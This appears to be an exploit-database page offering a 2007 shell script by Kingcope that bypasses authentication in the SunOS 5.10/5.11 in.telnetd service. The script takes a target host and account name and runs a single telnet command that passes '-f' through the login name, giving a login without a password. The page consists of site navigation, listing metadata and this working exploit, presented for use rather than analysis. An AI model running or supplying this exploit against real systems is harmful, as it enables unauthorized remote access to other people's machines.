[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit

Author
kcope
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8833
Category
remote exploits
Date add
11-02-2007
Platform
solaris
===============================================================
SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit
===============================================================

#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1



#  0day.today [2024-11-15]  #